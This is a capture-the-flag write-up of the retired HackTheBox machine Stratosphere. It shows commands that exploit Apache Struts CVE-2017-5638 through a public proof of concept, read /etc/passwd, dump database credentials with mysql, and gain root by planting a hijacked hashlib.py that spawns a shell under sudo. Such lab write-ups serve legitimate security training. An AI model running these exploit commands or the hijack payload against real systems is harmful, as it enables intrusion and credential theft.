HackTheBox – Stratosphere Writeup

Hi All, Stratopshere machine  retired today on hackthebox Andddddddd YES! I will explain how I solved Stratosphere box on Hackthebox  . This was  a medium difficulty level box and one of the interesting box that has a nice privilege escalation technique.

check out hackthebox for upskilling your pentest game : https://www.hackthebox.eu/

lets begin with basic nmap scan.

 

root@kali:~# nmap -sC -sV 10.10.10.64 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-31 21:57 IST
Nmap scan report for 10.10.10.64
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http

from nmap scan , we have three ports open , out of which, port 80 and 22 is notable. It is feasible to start our enumeration from the web  port 80 .

From the dirbuster bruteforce , we find out that there is hidden site hosted at http://10.10.10.64/Monitoring/

After a quick enumeration it is found out that , site is built using struts , and also vulnerable to Apache Struts CVE-2017-5638.

POC can be found here :  https://github.com/mazen160/struts-pwn

we can get the code execution by executing the POC file as follows.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘cat /etc/passwd’

<<snipped>>

richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash

<<snipped>>

from /etc/passwd file, we get the user named ‘richard‘ active on the machine

similarly it is found that it is running mysql with credentials ‘admin’/’admin’ from a file named db_connect . but since mysql is not exposed to the public, we have to rely on our previously found RCE to execute sql commands. this can be done as follows :

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “show tables;”‘

from dumping tables , we find a table named ‘accounts‘ .

further dumping data from accounts table reveals certain credentials ,

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “select * from accounts;”‘

fullName                       password                                                             username
Richard F. Smith   9tc*rhKuG5TyXvUJOrE^5CK7k     richard

These credentials can be used to connect through SSH on port 22. this gives us the user flag.

richard@stratosphere:~$ ls
Desktop             hashlib.py        __pycache__ test.py          user.txt

 

by quick enumeration , it is found out richard can execute few commands as root:

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

and also , quick analysis of source code from test.py reveals, it is using hashlib library.

#!/usr/bin/python3
import hashlib

<<snipped>>

we can use a classic python priv esc library hijacking technique , where we can exploit how python looks for the imported libraries .

Since we have write permission to the working directory of the privileged python file. we can create a file named ‘hashlib.py’ with our custom code..  this makes python parser to look at our created file instead of the actual library file intended.

create a file named ‘hashlib.py’ in the same directory where ‘test.py’ is present with following content to display contents of  root.txt file and spawn a root shell.(more on this priv esc technique: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)

import os
import pty
os.system(‘cat /root/root.txt’)
pty.spawn(“/bin/sh”)

now lets execute the following command to gain ROOT!

richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/test.py

#

Thank you. stay tuned for the next write up!